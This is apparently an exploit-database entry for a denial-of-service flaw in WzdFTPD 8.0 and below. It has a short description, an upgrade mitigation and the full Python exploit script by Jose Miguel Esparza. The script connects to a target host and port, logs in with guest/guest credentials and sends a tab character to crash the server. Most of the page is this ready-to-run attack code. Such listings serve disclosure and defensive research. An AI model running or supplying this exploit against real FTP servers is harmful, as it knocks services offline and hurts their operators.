header-logo
Suggest Exploit
vendor:
WzdFTPD
by:
Jose Miguel Esparza
7,5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: WzdFTPD
Affected Version From: 8.0 and below
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2007

WzdFTPD Denial of Service (<= 8.0)

This exploit is used to cause a denial of service in WzdFTPD version 8.0 and below. It works by sending a tab character to the server after authenticating with valid credentials. This causes the server to crash.

Mitigation:

Upgrade to the latest version of WzdFTPD to fix this vulnerability.
Source

Exploit-DB raw data:

#!/usr/bin/env python
#
# WzdFTPD Denial of Service (<= 8.0)
#
# wzdftpd_dos.py by Jose Miguel Esparza
# 2007-01-19 S21sec labs

import sys,socket

user = "guest"
passw = "guest"
if len(sys.argv) != 3: 
	sys.exit("Usage: " + sys.argv[0] + " target_host target_port\n")
target = sys.argv[1]
targetPort = int(sys.argv[2])

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target,targetPort))
s.recv(1024)
s.sendall("USER " + user + "\r\n")
s.recv(1024)
s.sendall("PASS " + passw + "\r\n")
s.recv(1024)
s.sendall("\t")
s.close()

# milw0rm.com [2009-07-24]